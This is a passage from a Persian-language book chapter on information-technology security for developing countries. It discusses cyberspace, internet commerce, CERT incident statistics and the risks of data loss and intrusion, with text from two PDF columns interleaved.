‫ﺳﺮﻗﺖ ﻭ ﻭﻗﻮﻉ ﺗﺨﻠﻒ ﻣﺎﻟﻲ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﻣﺤﺼﻮﺭ ﺑﻪ ﺁﻥ‬ ‫ﻣﺎﻳﻞ ﺑﻪ ﺣﻔﻆ ﺣﻘﻮﻕ ﺍﻓﺮﺍﺩ ﻣﻲﺑﺎﺷـﻨﺪ‪ ،‬ﮔﺮﭼـﻪ ﻣﻴـﺰﺍﻥ ﻭ ﺷـﺪﺕ‬
‫ﺷﺮﻛﺖ ﻧﻴﺴﺖ ﻭ ﺩﺭ ﻛﻞ ﺻﻨﻌﺖ ﻛﺸﻮﺭ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ‪.‬‬ ‫ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺗـﺎ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ‪.‬‬
‫ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻨـﺎﻓﻊ ﺣﺎﺻـﻞ ﺍﺯ‬
‫ﺑﺎ ﮔﺴﺘﺮﺵ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻧﻮﻇﻬﻮﺭ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﺭﺯﺷﻬﺎ ﻭ‬
‫ﺣﻤﻼﺕ ﺳﺎﻳﺒﺮ‪ ،١٧‬ﺗﻌﺪﺍﺩ ﭼﻨﻴﻦ ﺣﻮﺍﺩﺛﻲ ﻧﻴﺰ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪:‬‬
‫ﺁﺯﺍﺩﻳﻬﺎﻳﻲ ﻛﻪ ﺑﺪﻭﻥ ﺁﻥ ﻓﻨﺎﻭﺭﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑـﻮﺩ‬
‫"ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﻧﻘﻄﺔ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤـﻼﺕ‬ ‫ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﻨﻨﺪ‪ .‬ﻣﻮﺿﻮﻉ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ‬
‫ﺗﺮﻭﺭﻳﺴﺘﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭﻧﻈـﺮ ﺩﺍﺷـﺖ ﻛـﻪ‬ ‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺗﺄﺛﻴﺮ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻭ ﺍﻣﻜﺎﻧﺎﺕ ﻧﻮﻳﻦ‬
‫ﺑﺮﺧﻲ ﺍﻗﺪﺍﻣﺎﺕ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﻧﺪ ﻛـﻪ‬ ‫ﺑﺮ ﺁﺯﺍﺩﻳﻬﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﮔﺎﻣﻬـﺎﻱ‬
‫ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﻧﺒﺎﻝ ﻛﺴﺐ ﺩﺭﺁﻣﺪ ﻫﺴﺘﻨﺪ‪ .‬ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬ ‫ﻣﺆﺛﺮﻱ ﺑﺮﺩﺍﺭﻧﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻧﺪ ﺍﮔـﺮ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ )‪ ١٨(CERT‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻣـﻴﻼﺩﻱ ﺭﻗﻤـﻲ ﺑﺮﺍﺑـﺮ ﺑـﺎ‬ ‫ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺁﺯﺍﺩﻳﻬـﺎﻱ ﻓﻌﻠـﻲ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤـﻲﻛﻨﻨـﺪ‪،‬‬
‫‪ ۵۲۶۵۸‬ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﻛـﻪ ﺩﻭ ﺑﺮﺍﺑـﺮ‬ ‫ﺣﺪﺍﻗﻞ ﻳﻚ ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺗﻌﺪﺍﺩ ﻳﻜﺴﺎﻝ ﻗﺒﻠﺘﺮ ﺍﺳﺖ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺩﻭ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺁﻥ ﭼﻬﺎﺭ‬
‫‪١٩‬‬ ‫ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‪ ١٥‬ﺷـﻨﺎﺧﺘﻪ‬ ‫ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﺍﺑﺮ ﻣﻲﺑﺎﺷﺪ‪".‬‬
‫ﻣﻲﺷﻮﺩ ﻭ ﺗﻌﺮﻳﻒ ﺁﻥ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛـﻪ‬
‫ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬ ‫ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ ﻣـﻲ ﺷـﻮﻧﺪ ﻭ‬
‫ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻮﺍﺻﻞ ﺭﺍ ﺍﺯ‬ ‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ ١٦.‬ﺩﺭ‬
‫ﻣﻴﺎﻥ ﺑﺮﺩﺍﺭﺩ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﺑﻲﺷﻤﺎﺭﻱ ﺭﺍ ﻓـﺮﺍﻫﻢ ﻛﻨـﺪ‪.‬‬ ‫ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻢ ﻣﺜﻞ ﻓﻀﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻼﻗﺎﺗﻬﺎ‬
‫ﺑــﺎ ﻭﺟــﻮﺩ ﺷــﺒﻜﺔ ﺟﻬــﺎﻧﻲ ﻭﺏ‪ ،‬ﺍﻳﻨﺘﺮﻧــﺖ ﻗــﺎﺩﺭ ﺧﻮﺍﻫــﺪ ﺑــﻮﺩ ﺍﺯ‬ ‫ﻭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺻﺤﺒﺖ ﻛﺮﺩ‪ ،‬ﺍﻣـﺎ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺭﻓﺘـﺎﺭ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺩﺭﺑــﺎﺭﺓ ﺷــﺮﻛﺘﻬﺎ‪ ،‬ﺍﻣﻜﺎﻧــﺎﺕ‪ ،‬ﻭ ﻣﺤــﺼﻮﻻﺕ‬ ‫ﺳﺎﻳﺒﺮ ﻭ ﺩﻧﻴﺎﻱ ﺣﻘﻴﻘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺯﻧﺪﮔﻲ‪ ،‬ﻛﺎﺭ ﻭ ﺑﺎﺯﻱ ﻣﻲﻛﻨـﻴﻢ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﻭ ﺗﺠـﺎﺭﺕ ﺭﺍ ﺩﺭ ﺁﻧﻬـﺎ‬ ‫ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﺷﺪ‪.‬‬
‫ﺗﻮﺳــﻌﻪ ﺩﻫــﺪ‪ .‬ﻋــﻼﻭﻩ ﺑــﺮ ﺍﻳــﻦ‪ ،‬ﻣﻮﺗﻮﺭﻫــﺎﻱ ﺟــﺴﺘﺠﻮ ﺍﺯ ﻧﻈــﺮ‬
‫ﮔــﺴﺘﺮﺵ ﻭ ﺭﻭﺍﺝ ﺳــﺮﻳﻊ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﺷﺨــﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺭ‬
‫ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﺗﻤﺎﻳﺰﻱ ﻣﻴﺎﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻗﺎﺋـﻞ ﻧﻤـﻲ ﺷـﻮﻧﺪ؛ ﻭ‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺗﺄﻣﻴﻦ ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻭ ﻛﺎﻻﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﻣﻮﺍﺩ‬ ‫ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻨـﺎﻓﻊ ﺑـﺴﻴﺎﺭﻱ‬
‫ﺍﻭﻟﻴـــﺔ ﻛـــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـــﺎﻝ ﺗﻮﺳـــﻌﻪ ﺭﻭﻱ ﻭﺏ ﺩﺭ ﻛﻨـــﺎﺭ‬ ‫ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺨﻮﺩﻱ ﺧﻮﺩ ﺭﺳـﺎﻧﻪﺍﻱ ﻧﻴـﺴﺖ‬
‫ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﻛﺎﻻﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻗـﺮﺍﺭ‬ ‫ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﺭﻓﺘﺎﺭ ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﺍﻳﻤﻨﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻫﺰﻳﻨـﺔ ﻋـﺪﻡ‬
‫‪٢١‬‬ ‫ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﻮﺭﺩ‬
‫ﻣﻲﮔﻴﺮﻧﺪ‪ ٢٠.‬ﺍﻳﻦ ﺍﻣﺮ ﺭﺍ ﮔﺎﻫﻲ "ﻣـﺮﮒ ﻓﺎﺻـﻠﻪﻫـﺎ" ﻣـﻲﻧﺎﻣﻨـﺪ؛‬
‫ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﺑـﺰﺭﮒ ﻳـﺎ ﻣﺆﺳـﺴﺔ ﺩﻭﻟﺘـﻲ‬
‫ﻭﺍﮊﻩﺍﻱ ﻛﻪ ﺭﻭﻧﺪ ﺟﺮﻳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺑﺎﺷﺪ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻫﻴﺘﹰﺎ ﺍﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﺍﻣﺎ ﻫﺰﻳﻨـﺔ‬
‫ﺍﻣﻦ ﻛﺮﺩﻥ ﺁﻥ ﻧﻴﺰ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ‬
‫‪17‬‬ ‫‪Cyber Attacks‬‬
‫‪18‬‬ ‫‪Computer Emergency Response Team‬‬
‫‪19‬‬ ‫‪Reuters/USA Today, April 16, 2003‬‬ ‫‪15‬‬ ‫‪Cyberspace‬‬
‫ﺩﺭ ﺣﻘﻴﻘﺖ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﺑـﺎﻥ ﻣﻴـﺎﻥ ﭘﺎﺳـﺨﻬﺎﻱ‬ ‫‪۲۰‬‬ ‫"ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ" ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺗﻮﺳـﻂ ﻳـﻚ ﻧﻮﻳـﺴﻨﺪﻩ ﺑـﻪ ﻧـﺎﻡ ‪William‬‬ ‫‪۱۶‬‬
‫ﻳﺎﻓﺘﻪﺷﺪﻩ ﺗﻔﺎﻭﺕ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ ،‬ﻭ ﻟﺬﺍ ﺩﺭ ﺑﺎﺯﺍﺭ ﺟﻬﺎﻧﻲ ﻫﺮ ﻛـﺲ ﺑﺎﻳـﺪ ﺑـﻪ‬ ‫‪ Gibson‬ﺑﺮﺍﻱ ﻳﻚ ﺩﻧﻴﺎﻱ ﻣﻮﺍﺯﻱ ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺮﺍﺳﺮ ﺩﻧﻴـﺎ‬
‫ﺯﺑﺎﻥ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﺧﻮﺩ ﺻـﺤﺒﺖ ﻛﻨـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ‬ ‫ﺳـــﺎﺧﺘﻪ ﺷـــﺪﻩ ﺑـــﻮﺩ ﺩﺭ ﺳـــﺎﻝ ‪ ۱۹۸۴‬ﻭ ﺩﺭ ﺭﻣـــﺎﻥ ﺍﻭ ﺑـــﺎ ﻋﻨـــﻮﺍﻥ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﺗﺤﻤﻞ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻨﺘﻈـﺮ ﺩﺭﻳﺎﻓـﺖ‬ ‫"‪ "Neuromancer‬ﺑﻜﺎﺭ ﺭﻓﺖ‪ .‬ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺩﺑﻴﺎﺕ ﻣﻔﻴﺪ‬
‫ﭘﺎﺳﺦ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﺭﺗﺒﺎﻃـﺸﺎﻥ ﻛﻨـﺪ ﺍﺳـﺖ‪ .‬ﺩﺭ ﻫﺮﺣـﺎﻝ‬ ‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﻌﻨﻲ ﺁﻥ ﺑﺘﺪﺭﻳﺞ ﺍﺯ ﺁﻧﭽﻪ ‪ Gibson‬ﻣﺪ ﻧﻈﺮ ﺩﺍﺷـﺖ ﺗﻐﻴﻴـﺮ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻣﻴﺰﺑﺎﻧﻲ‬ ‫ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻫﻤﻴﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﻭ‬
‫ﻛﻨﻨﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﻞ ﻣﻴﺰﺑﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺑﺮﮔﺰﻳﻨﻨـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﻪ‬ ‫ﻳﺎ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫ﺑﺎﺯﺍﺭﻫــﺎﻱ ﻫــﺪﻑ ﻧﺰﺩﻳــﻚ ﺑﺎﺷــﺪ‪ .‬ﺑﻌــﻀﻲ ﺍﺯ ﺷــﺮﻛﺘﻬﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ‬ ‫‪Intven, et al., Legal and Regulatory Aspects of‬‬
‫‪e-Commerce and the Internet, World Bank‬‬
‫ﺍﻧﻌﻜﺎﺳﻲ )‪ (mirror sites‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻳـﻚ‬ ‫)‪Legal Review, vol. 1 2003, at fn 17. (Kluwer‬‬
‫‪٣١‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﺳﻴــﺴﺘﻤﻬﺎ ﻭﺍﺭﺩ ﺷــﻮﻧﺪ ﻭ ﻣــﺸﻜﻼﺗﻲ ﺑﻮﺟــﻮﺩ ﺑﻴﺎﻭﺭﻧــﺪ‪ .‬ﺑﻴــﺸﺘﺮ‬ ‫ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻫﻤﻮﺍﺭﻩ ﻣﺨﺎﻃﺮﺍﺗﻲ ﺟﺪﻱ ﻣﺎﻧﻨـﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ‬
‫ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺯ ﺟﺎﻧﺐ ﺧﺮﺍﺑﻜﺎﺭﻫﺎ‪ ٢٤‬ﻧﺎﺷـﻲ‬ ‫ﺳﻮﺍﺑﻖ‪ ،‬ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ،‬ﺧـﺮﺍﺏ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

‫ﻣﻲﺷﻮﺩ‪ .‬ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﺍﻓﺮﺍﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺛﺎﺑـﺖ ﻛﻨﻨـﺪ‬ ‫ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺧﺼﻤﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺗﻤﺎﻡ ﻳـﺎ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﺮ ﺳﺪ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺳﺮ ﺭﺍﻫﺸﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‬ ‫ﺑﺨﺸﻲ ﺍﺯ ﺳﻮﺍﺑﻖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺯﻣﻴﻨﮕﻴـﺮ‬
‫ﻋﺒﻮﺭ ﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﻢ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺭﺍ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ‬ ‫ﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺁﻥ ﺿـﻌﻴﻒ‬
‫ﻣﺪﻝ ﻛﻨﻴﻢ ﺑﺎﻳﺪ ﻓﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﺩﻫـﻴﻢ ﻛـﻪ ﻣـﻲﺧﻮﺍﻫـﺪ‬ ‫ﺍﺳﺖ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ ﺁﻥ ﺩﺭ ﻣﻌـﺮﺽ‬
‫ﺛﺎﺑﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﺎﻧﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺪﻭﻥ ﺩﺳﺖ‬ ‫ﺧﻄﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﺻﺪﻣﺎﺕ ﺟﺒﺮﺍﻥ ﻧﺎﭘـﺬﻳﺮﻱ ﻭﺍﺭﺩ ﺷـﻮﺩ‪.‬‬
‫ﺯﺩﻥ ﺑﻪ ﭼﻴﺰﻱ ﺧﺎﺭﺝ ﺷﻮﺩ! ﭼﻨﻴﻦ ﭘﺪﻳﺪﻩﺍﻱ ﻧﻪﺗﻨﻬﺎ ﻣﻮﺟﺐ ﺑـﺮﻭﺯ‬ ‫ﻋﺪﻡ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺍﺑـﻂ‬
‫ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﻋﺪﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﺭﺍ ﻧﻴـﺰ‬ ‫ﺧﺎﺭﺟﻲ ﺩﺭ ﺻﻨﺎﻳﻊ ﺧﻮﺩ ﺍﻫﻤﻴـﺖ ﻣـﻲﺩﻫﻨـﺪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ‬
‫ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻦ ﻳـﺎ ﻛـﻢ ﺷـﺪﻥ‬ ‫ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﻭ ﭘﻴﺶ ﺑﻴﻨﻲ ﻧﺸﺪﻩ ﺍﻱ ﮔﺮﺩﺩ‪ .‬ﻧﻴﻞ ﺑـﻪ ﺍﻫـﺪﺍﻑ‬
‫ﺍﺳﺖ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬ ‫ﺗﻮﺳﻌﺔ ﻫﺰﺍﺭﻩ )‪ ٢٢(MDG‬ﺑﻪ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ‬
‫ﻧﻔﻮﺫﻫﺎﻱ ﺑﻌﺪﻱ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺩﺭ‬ ‫ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺑﻮﺩﺟـﺔ ﺁﻧﻬـﺎ ﺑـﺎ‬
‫‪٢٣‬‬
‫ﺩﻧﻴــﺎﻱ ﻭﺍﻗﻌــﻲ ﻗﺎﺑــﻞ ﺗﺤﻤــﻞ ﻧﻴــﺴﺖ‪ ،‬ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻫــﻢ‬ ‫ﻋﻀﻮﻳﺖ ﺩﺍﺋﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ‪.‬‬
